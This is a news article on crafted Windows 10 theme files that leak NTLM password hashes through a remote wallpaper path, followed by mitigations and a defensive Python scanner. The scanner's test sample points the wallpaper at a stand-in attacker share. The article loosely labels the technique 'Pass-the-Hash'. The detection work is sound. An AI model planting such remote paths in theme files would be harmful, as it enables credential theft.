Tuesday, January 19, 03:24

Windows 10 themes are used to steal credentials

Specially crafted Windows 10 themes can be used in "Pass-the-Hash" attacks to steal the Windows account credentials of unsuspecting users.

Windows allows users to create custom themes that contain colors, sounds, mouse cursors, and wallpaper that the operating system uses.

Windows users can then switch between themes to change the look of the operating system.

The settings of a theme are saved in the folder %AppData%\Microsoft\Windows\Themes as a file with a .theme extension (e.g. "Custom Dark.theme").

A theme can then be shared with other users by right-clicking the active theme and selecting "Save theme for sharing", which packages it into a ".deskthemepack" file.

These desktop theme packages can then be sent by e-mail or offered as downloads on websites, and are installed by double-clicking on them.

However, security researcher Jimmy Bayne (@bohops) revealed that specially crafted Windows themes can be used to carry out Pass-the-Hash attacks.

Pass-the-Hash attacks are used to steal Windows credentials (login names and password hashes) by tricking the user into connecting to a remote file-sharing server that requires authentication.

When such a resource is accessed, Windows automatically tries to connect to the remote system by sending the user's login name and an NTLM hash of the password.

In a Pass-the-Hash attack, the attackers collect the credentials that are sent and then try to crack the hash to recover the user's login name and password.

Cracking an easy password can be done in a matter of seconds.

In the new method discovered by Bayne, an attacker creates a specially crafted .theme file whose desktop wallpaper setting points to a resource on a remote system that requires authentication.

The user's credentials are then sent in the manner described above. The attacker collects them and cracks the hash using dedicated scripts.

As Microsoft moves away from local accounts on Windows 10, remote intruders can use this attack to gain easier access to the many remote services Microsoft offers.

This includes possible remote access to e-mail, Azure, or corporate networks.

Bayne said he reported the attack to Microsoft earlier this year, but was told it would not be fixed, as it is "design-specific".

Protecting Windows against the attack

Bayne recommended blocking the .theme, .themepack and .desktopthemepackfile extensions. However, this disables the Windows 10 themes feature, so users should only do this if they do not need to switch to another theme.

Windows 10 users can also use the group policy "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" and set it to "Deny All" to prevent NTLM credentials from being sent to remote systems.
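A .theme file is a plain INI-style file, so the wallpaper trick described above can be checked for before a downloaded theme is applied. The following is an added example (not code from the article or from Bayne's research) that parses a theme's text and flags any setting whose value points at a remote host, a UNC path or an http(s) URL, generalising slightly beyond the wallpaper entry to every path-valued key; the theme contents and the hostname are constructed placeholders.

```python
import configparser
import re
from typing import List, Tuple

# Any value that starts with a UNC path (\\host\share\...) or an http(s) URL
# points off the local machine; applying the theme makes Windows open it,
# which can trigger an outgoing NTLM authentication to that host.
REMOTE_RE = re.compile(r"^\s*(\\\\[^\\]+\\|https?://)", re.IGNORECASE)

# Constructed sample: a benign theme with the usual local wallpaper path.
BENIGN_THEME = """[Theme]
DisplayName=Custom Dark
[Control Panel\\Desktop]
Wallpaper=%SystemRoot%\\web\\wallpaper\\Windows\\img0.jpg
WallpaperStyle=10
[VisualStyles]
Path=%SystemRoot%\\resources\\Themes\\Aero\\Aero.msstyles
"""

# Constructed sample of the pattern the article describes: the wallpaper
# path points at a share on a remote host (placeholder hostname).
SUSPICIOUS_THEME = BENIGN_THEME.replace(
    "Wallpaper=%SystemRoot%\\web\\wallpaper\\Windows\\img0.jpg",
    "Wallpaper=\\\\attacker-host.invalid\\share\\wallpaper.jpg",
)


def find_remote_paths(theme_text: str) -> List[Tuple[str, str, str]]:
    """Return (section, key, value) for every value naming a remote resource."""
    parser = configparser.ConfigParser(
        interpolation=None, strict=False, allow_no_value=True
    )
    parser.optionxform = str  # keep key names exactly as written in the file
    parser.read_string(theme_text)
    hits = []
    for section in parser.sections():
        for key, value in parser.items(section):
            if value and REMOTE_RE.match(value):
                hits.append((section, key, value))
    return hits


def is_suspicious(theme_text: str) -> bool:
    """True when at least one theme setting would make Windows contact a remote host."""
    return bool(find_remote_paths(theme_text))


if __name__ == "__main__":
    for name, text in (("benign", BENIGN_THEME), ("suspicious", SUSPICIOUS_THEME)):
        print(name, find_remote_paths(text))
```

Real .theme files are often saved as UTF-16; decode the file with the right encoding before passing its text to the function.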

Finally, enabling multi-factor authentication on Microsoft accounts is good practice to prevent third parties from gaining access to the account.

